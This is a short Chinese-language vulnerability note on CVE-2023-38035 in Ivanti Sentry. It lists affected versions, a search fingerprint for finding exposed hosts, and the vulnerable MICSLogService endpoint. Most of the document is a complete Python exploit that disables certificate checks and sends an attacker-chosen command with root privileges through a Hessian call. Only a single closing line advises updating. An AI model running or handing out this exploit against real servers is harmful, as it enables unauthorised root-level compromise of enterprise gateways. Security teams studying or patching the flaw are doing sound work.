CVE-2023-38035 RCE漏洞

Ivanti Sentry 9.18、9.17、9.16、9.15及以下

title="MobileIron System Manager"body="Requires a local Sentry administrative user"

/mics/services/MICSLogService

https://github.com/horizon3ai/CVE-2023-38035
from pyhessian.client import HessianProxyfrom http.client import HTTPSConnectionimport sslimport sysimport argparseimport requestsimport urllib3urllib3.disable_warnings()

# Backup original constructor_original_https_init = HTTPSConnection.__init__
def patched_https_init(self, *args, **kwargs):    # If context is not provided, use unverified context    if 'context' not in kwargs:        kwargs['context'] = ssl._create_unverified_context()    _original_https_init(self, *args, **kwargs)

def exploit(base_url, command):    # Define the Hessian service endpoint    service_url = f"{base_url}/mics/services/MICSLogService"        r = requests.get(service_url, verify=False)    if r.status_code != 405:        print('[-] Vulnerable endpoint was not reachable - bailing')        sys.exit()
    # Monkey-patch the constructor    HTTPSConnection.__init__ = patched_https_init        dto = {        "command": command,        "isRoot": True,    }        # Create a Hessian proxy for the service    proxy = HessianProxy(service_url)        # Call a method on the Hessian service:    details = proxy.uploadFileUsingFileInput(dto, None)    if details:        print('[+] Successfully executed command on target!')
if __name__ == "__main__":    parser = argparse.ArgumentParser()    parser.add_argument('-u', '--url', help='The URL of the target', required=True)    parser.add_argument('-c', '--cmd', help='The command to run', required=True)    args = parser.parse_args()
    exploit(args.url, args.cmd)

建议及时更新至最新版本！